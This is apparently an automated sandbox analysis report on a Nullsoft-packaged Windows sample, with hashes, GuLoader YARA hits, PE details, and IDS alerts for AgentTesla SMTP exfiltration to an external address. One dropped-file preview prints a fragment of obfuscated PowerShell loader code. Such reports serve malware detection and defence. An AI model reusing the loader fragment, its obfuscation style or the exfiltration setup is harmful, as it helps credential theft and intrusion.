Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.070004038570087
Encrypted:	false
SSDEEP:	3:QAXVaPRJI0bvy:HXVaP7O
MD5:	76A839ED464E25ED3A060D4A41772277
SHA1:	3E9AA586550E5AA9CD13CD8BB9E2C299A3AB9BA8
SHA-256:	B851E8E5C058CC715190866A595D11A0BDF51898244B76E959653F90992FEE05
SHA-512:	434F9C698E05AA687A063EEA2A96F761D8A3ECC344FD70AF70502F719027AD7FAE9CB59F35F53B86257A6368294A53150733C0A4447F179094D1B5F6AF44A50C
Malicious:	false
Reputation:	low
Preview:	[Kringlerne205]..garderobenumrene=uvornhedernes..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5:	A35685B2B980F4BD3C6FD278EA661412
SHA1:	59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256:	3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512:	70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.Hav

Download File

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	data
Category:	dropped
Size (bytes):	417075
Entropy (8bit):	7.6324805562500355
Encrypted:	false
SSDEEP:	6144:01e/w7akeM0NHWIIRvVbA2oIWe44KDoIH442Tk8CHn1KfC6011iJcd:01e/zM0N2II1V/go2435CVKfYEJs
MD5:	B2241C3B5C876473B1C5B574E57545B7
SHA1:	A202A0F035BA6407A406E63C8502F3A6EF32AB78
SHA-256:	0AB3AC15E965390BE40F2618602680854CA7C99B61F21B19A7E9796A701D458E
SHA-512:	CA339FF586068B26AA6DECAC6D42EE2DE95D92F5D3FA0270A3CD5268D5A4AE6424C9F3C8E81A76243E87F20C91D4271E927597BE2B7B60BEEE6E29827C3985CE
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Dusinenes.Hav, Author: Joe Security
Reputation:	low
Preview:	.............4444.]]]]].........u.........aa.s.````......y....................]].......MMM...............8..............9..9.111.................f..888..........ggg......G........NN....####....p.#.....).3.RRR.##...........8......GG......HH........C..............}..GG.......................WWWW........J.OO................................~~~.....................RR....-.........I..cc...&...........5..........##...............))...)...5..........##.OO.b.....M..................6.........u."......mm.......................dd.........KK.DD.................u...........8.???....t./..\..^^...........WW.9..3.h..E......FF............((.q....ee..........o.^..ff....l.......gg..............''..........jjj...........:..\\\..........................ii..i.....z.......................''.............................................................................'''.......QQ.??.........0.....rr.......P.....S...............i......c..OO...n.d..<<.H....$$.LL.......m......w................K....'......++....@..

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\Heterognath.Hjs

Download File

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	ASCII text, with very long lines (4183), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	72126
Entropy (8bit):	5.177876289108867
Encrypted:	false
SSDEEP:	1536:fZry9pJQSDE2QOSN6kSWlseqwXMCui4eF5BaLC8AGfXiNNRVNwtt:fZry9pJXVdSA2GSbF5BaLUoiDlwz
MD5:	2C18E32DB9C92D5D34BA98C74D359E41
SHA1:	1E595B40523CBD6D8AF52C7D216B8B68D8D95475
SHA-256:	6B74258103AC12452F38860864903D37ACCB0567AE7A7532D49CEAB524797775
SHA-512:	ED83C9CD8F23030905932CE921924579F2A45EAF3F8EB1E1F8CE82A6075B7909F6228738AD9EB3E0576DE9A03302D0B39AF16B6061DE0CCA10646F8050F70AD0
Malicious:	true
Reputation:	low
Preview:	$Frolicsomely=$Easily;..<#Demobilisationerne callisection Unkilling Deglazed arbejdsfrie #>..<#Vulg Svanesang sitdownstrejken #>..<#honnr koordinatsts Fingereredes #>..<#Goldenrod Chondrilla Pukkelokse Pursual Sanities #>..<#flammes Thromboclasis Credoer Economic klostertorv Fordampede #>..<#Hooka sproutage Unantique Venstrevendt Fjeldskreddets Elementalistically #>...$Regainable = @'.Produce.Noninte$Niogty SantibiokZooma cvValutaljKritrime,alvrimtCurioss=dishwat$ owncurTRefugieaTrenservHippopheGgendesr Sal adn TrispaiGuldgraslangemaeForlang;Glamhul.Sta ttifBleachauPerforen ChimolcSminkebt FastsaiOmfa nioDway.einElectro FalsetJServi eeHariolarStaldfieUnabbrem SorensiMerceria .essounSkolarei FacadecSlagels Skrmst(.aaretv$Brandisr VillaeeIntereskAfsendtn FagottoTvrretntFloskle,Asphyxy$.imenhjPGrowlierScriptoobenzosugDi tribrtub lifa P riegmFoliantrsid.evoeTrilliod ScamanaStatuarkDrengebtBaandspr,kkolodeAristokr.ulekaknDiscoune Lymf t)Uforsta Chuddar{Trichog. klikes. Produk$AfbenerRTran

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\kloakanlgget.txt

Download File

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	ASCII text, with very long lines (413), with CRLF line terminators
Category:	dropped
Size (bytes):	415
Entropy (8bit):	4.261366184084369
Encrypted:	false
SSDEEP:	6:bMIsP3NUXNzOITZ80LQBkN68gdX3XTKXIj2hEJtiN6MwALUGKtpyWggLuZE9yjFz:bG3NUXR60AiXIyhEXfSKtMgLkfOgVU0
MD5:	23F21C95462F380DCCA7396E44AF4F66
SHA1:	F0A92E02E38F5FAC118BFAE8799850F269901444
SHA-256:	C485EFD3DA91587D473D6F94728417C920FF7809A364895CF9B94E6B459A8486
SHA-512:	AA700B8D7CBBE7A214B06A6F4E114F2AC71BFE461EF66643C59BBC6433E144C0286C3242F34952DF294ECF527B2DB147CFC3ADDDCD36A2BF40C3CF4B7DC50B07
Malicious:	false
Reputation:	low
Preview:	slappy boltage cardipaludism aksets fiskenettene phyllitis,succeslse tidology chivies.maskinvrkstederne tarns underdepth abb guesten azoxime.rhizopods loppers dilettanteriet anisotrop.decistere toilettaskernes intercombination implicerede myrmotherine enthelmintha cementeringers,serpette aasmunds strikketj oxidisability inkurabel tirsdagsmde trillian counteractingly udstraalende overriding bhlam genfortllingen..

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\overnatningssted.osm

Download File

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	data
Category:	dropped
Size (bytes):	181294
Entropy (8bit):	4.932171597791879
Encrypted:	false
SSDEEP:	3072:PWZ38TcdyEiAIdL+6atb4M20dN4Olv/AP26TgjJjvqzH2fsewaih2w7QC2FTofK:OBicILFatb4MjCOlnAP26TgVoTaq7Sv
MD5:	D09648CA5E7B8C5B5B2DDA3BCDBBA069
SHA1:	6E060FE35373D3117A50241282EBC657D7DCA827
SHA-256:	976E36495A1120100BEF38A54E3F84CF2528C6203815EEAFC8520C39A37769C9
SHA-512:	0BCDA61608BD7E2B024A94AD6EA4EB229D1FB794EDE7D462C96AD2516B4E4DFF473BE9D68E5DE6548C8910CA5BC8C7E9E069D4E03107CF3BEC1DF4726633D738
Malicious:	false
Reputation:	low
Preview:	......f...6.........8.....aJ.........u..D....!.~..........^..'.............{.g...........jp.....w.........Y./...!........\|..+.d...u.....R............$.........<.................W.....tg.......V..h.O}.....~.96OU..v....ig......<.1VN..2.................Rc.H^..2........:.........@...P.~.._..../.......l..t.............. ............T..k.....C3.....V.....................]..........,..S.............._.........I.....V.../..-..A2.....s.%........0.......k..%.C........u.V......0.........J.....4...(..YW>.r.k......a.#...$.....y.......2...."%@.....C.......1...P.T.N..p..........d.....G.X>.:.v...#..E.R..M..Y..B.........r.Y..\|w........{..]..........t. ...g...5..C........{........}.3.$.w.....m...>...u.....v............g..............+z.E...w1..j.....>{..Dq.......~....^........;....VG.......n%...d...........C......u.X.......G.t..................P......{m.;..........................y.o%.........S.f.................3.............U. ........Q...."....Ix.....}...T.h...........J;.X...1...q?.....x....

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\rternes.sim

Download File

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	data
Category:	dropped
Size (bytes):	104710
Entropy (8bit):	4.932457638938974
Encrypted:	false
SSDEEP:	1536:bXX7bC5jLbV00e03fKpx6WAnmy4Pr18ujKSBUOug0EnxknlK3NEW:jHabi0ecrnor1VKSBUOd9kyv
MD5:	8B6CD2A99F8B800B6F469C2D725644C8
SHA1:	A507E4060289046B557AE00FB04ECC948B86CE82
SHA-256:	0E08CEBBD1CAD17EE182DA2C0ACCB694AABD56A5E9228D07F603D4BAF14B721C
SHA-512:	8023083A3AF39F73CE2371F2C84904AD5D9CD4054ACFC9328C734D8C8D10A6ABE6B800D26410361525E45C0848B66C3A72D9577A03B3F3C02626F9AD091FEAC7
Malicious:	false
Reputation:	low
Preview:	s..1..........+^......[...53....................6..+.....9....../...[...i..C.......M.p.........?...W..m......m(..................q..........{2T;..z.G.....%......6....2..............+'............R.....k.....XS.Z........^G........A....(.......H...q.r>..S...............X......\..{.....m.`8....".......R6...'..x.........#........._7...>.........../........."X........?d...........B...J.... ..........6...e..n...\|...5H.............`..#..>n.$.....<.......w...m.l.........+.........%....U..........2..K.J....%..{........:..........^...?p............8.},....j..............y........f..............Q>`/._.,.....8........*...OR.........................r&.n.sL...#..}.....G.............G...x9.....-.................g............F.........S...~............~..q............i..9.........D/-......q.-B.{.........,....q..............R..);.R........k.....A.k.............9n.Z.......5......b.E...r..U..C.............T........................c.....&I.....6..S.....x.M........-.&..........\|L...0...9.......

C:\Users\user\AppData\Local\Temp\Polyspondyly\immingles\sygeplejeres.fil

Download File

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	data
Category:	dropped
Size (bytes):	499165
Entropy (8bit):	4.93597084407956
Encrypted:	false
SSDEEP:	12288:Xb0ND3GZTlGsTzIqdIOSWKkizBGO3wDkYeymEJisTKA+NRh:XodOl/zHqOSWvyFwiyRJiaH+NP
MD5:	CAEBDA34E18DC7AC30573336EDAB663C
SHA1:	6F53BAA47681CE7C21482E4963D85D81828D2B89
SHA-256:	051A550A03AF7177702820CED314693CE798DE1E0D7E501E432C0DE814D660E9
SHA-512:	0B5D6701E2EA727C47B5389994E1AF32B3999409C4FAF8B783776A7C183CF93841439714364B189A1DB246FEF5FAEC7D26585D88AD02530C836EE9B10620C0E8
Malicious:	false
Preview:	>(O......2.......7.. [.T...F.....h.....`............h......1......7.....L..8e._.....................^..6..?D.[.%4.....................O.......V...I."............y...............k.... .....p....X...g.................7...y......q.......]9.....H...t)....E............v..>..R..................iM....+.N.........\|.....4..\|...Y......O.......9.'.....1._.......6..5..v...6C.a.n.....i..e.....l.....J..)...".uM...).m.p..........S.,..p............s.....6.............&..g.......f..6...1a....................[....K.>.....c..............v..`.....j......f&...........T..0.k...8.....1...O7........K".G.......H.\|........:..v..n...%.@t...l...B.....y..........q......C.u...~....W...o...O........\....wH...J<S....!.........M.....$*~..&....\|.....a/..G..............`...........%...:.w%.h......5.......P/l..'...`...........l.....s..............F.5...Y.............]..........m.t......G..I...._........b..O.~+.p.....9...............s.9....................q...j......kP........}......Z...}............&...Y

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ktw5ysw.tdm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3uzqhvf.ru3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmn2abq2.tvw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lorbuuq2.dlt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\nsc2139.tmp

Download File

Process:	C:\Users\user\Desktop\REnBTVfW8q.exe
File Type:	data
Category:	dropped
Size (bytes):	1283117
Entropy (8bit):	6.149666434053259
Encrypted:	false
SSDEEP:	24576:jZ2kCEkwcIB4il7PPO6odOl/zHqOSWvyFwiyRJiaH+NP:d2kCEkwFC6ocLFdq+q
MD5:	343E56585C8AD4B0F3D012A734A5DABF
SHA1:	67A032D92B29A782E06996A891D814AED9D58E0F
SHA-256:	26B4F5FEFA2F11A33E5E8896A1BC192C048146B541E92925385F0759C299C249
SHA-512:	8CE2C8D6BFB1FEEAB8B20B698C532155E606627D727096ACA029F1BEAEC2BBED49E5CCCBCDE2B26FA200A87EF541FBCBD8C0A531EEC4272F3A9A4CDC88014EBA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: C:\Users\user\AppData\Local\Temp\nsc2139.tmp, Author: Joe Security
Preview:	p ......,...................[...................p ..........................................................................................................................................................................................................................................G...W...............j...........................................................................................................................................%...5.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.830149799061535
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	REnBTVfW8q.exe
File size:	1'157'372 bytes
MD5:	e6a0bb6bcaf44fbcc341ef4c93482059
SHA1:	c624142c98aef78d3a0434cf308f42750315b4bb
SHA256:	5201c8e6b6fc7dab0c7877710df4ca1943b1f6c6d99e93bc0c21d79fa6ea9943
SHA512:	2c5c1e2585177207fcd192d6a26efe674bced3092768b8ab16dd78ff744cfbab4e47e8a08825ed5a82c0163c2933e5f411f41ae7e5492398a3b051021bef50ad
SSDEEP:	24576:8tOXYTDOxnFCCth1KjcaeGP8IV81WvrWp3p+GYE:8AXIqxnFCCtHKjq443p1YE
TLSH:	B83512527E2CE5E7FA3C32B22857C65A3FB4786A0B81575B75EAB21368013074E0F95C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....

File Icon


Icon Hash:	39a7a765765e5937

Static PE Info

General

Entrypoint:	0x403489
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	1f23f452093b5c1ff091a2f9fb4fa3e9

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+14h], ebx
mov dword ptr [esp+10h], 0040A230h
mov dword ptr [esp+1Ch], ebx
call dword ptr [004080ACh]
call dword ptr [004080A8h]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042A24Ch], eax
je 00007F8B086FC8F3h
push ebx
call 00007F8B086FFBA1h
cmp eax, ebx
je 00007F8B086FC8E9h
push 00000C00h
call eax
mov esi, 004082B0h
push esi
call 00007F8B086FFB1Bh
push esi
call dword ptr [00408150h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], 00000000h
jne 00007F8B086FC8CCh
push 0000000Ah
call 00007F8B086FFB74h
push 00000008h
call 00007F8B086FFB6Dh
push 00000006h
mov dword ptr [0042A244h], eax
call 00007F8B086FFB61h
cmp eax, ebx
je 00007F8B086FC8F1h
push 0000001Eh
call eax
test eax, eax
je 00007F8B086FC8E9h
or byte ptr [0042A24Fh], 00000040h
push ebp
call dword ptr [00408044h]
push ebx
call dword ptr [004082A0h]
mov dword ptr [0042A318h], eax
push ebx
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebx
push 004216E8h
call dword ptr [00408188h]
push 0040A384h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4d000	0x37a50	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x63d1	0x6400	139645791b76bd6f7b8c4472edbbdfe5	False	0.66515625	data	6.479451209065	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x138e	0x1400	007eff248f0493620a3fd3f7cadc755b	False	0.45	data	5.143831732151552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x20358	0x600	ec5bcec782f43a3fb7e8dfbe0d0db4db	False	0.501953125	data	4.000739070159718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2b000	0x22000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4d000	0x37a50	0x37c00	0a9549e2f266cd4b3a5efbeb1cd42a37	False	0.5249614630044843	data	6.504249010396493	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4d340	0x10a00	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.3221334586466165
RT_ICON	0x5dd40	0xee00	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9737066701680672
RT_ICON	0x6cb40	0x9600	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.35966145833333335
RT_ICON	0x76140	0x5600	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.39821039244186046
RT_ICON	0x7b740	0x4400	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.41515395220588236
RT_ICON	0x7fb40	0x2600	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.46895559210526316
RT_ICON	0x82140	0x1200	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	English	United States	0.5325520833333334
RT_ICON	0x83340	0xa00	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	English	United States	0.611328125
RT_ICON	0x83d40	0x600	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	English	United States	0.4986979166666667
RT_DIALOG	0x84340	0x100	data	English	United States	0.5234375
RT_DIALOG	0x84440	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x84560	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x84628	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x84688	0x84	data	English	United States	0.8484848484848485
RT_MANIFEST	0x84710	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll	GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-05T16:36:10.560898+0100	2030171	ET MALWARE AgentTesla Exfil Via SMTP	1	192.168.2.8	49714	208.91.199.223	587	TCP
2024-11-05T16:36:10.560898+0100	2840032	ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	1	192.168.2.8	49714	208.91.199.223	587	TCP
2024-11-05T16:36:34.240688+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.8	49705	TCP
2024-11-05T16:37:01.980691+0100	2855245	ETPRO MALWARE Agent Tesla Exfil via SMTP	1	192.168.2.8	49714	208.91.199.223	587	TCP
2024-11-05T16:37:01.980691+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.8	49714	208.91.199.223	587	TCP
2024-11-05T16:37:12.483432+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.8	49715	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 5, 2024 16:36:49.997534990 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:49.997560978 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:49.997643948 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:50.037348032 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:50.037364006 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:50.886822939 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:50.886924028 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:50.887685061 CET	443	49710	142.250.185.238	192.168.2.8
Nov 5, 2024 16:36:50.887742996 CET	49710	443	192.168.2.8	142.250.185.238
Nov 5, 2024 16:36:50.973699093 CET	49710	443	192.168.2.8	142.250.185.238
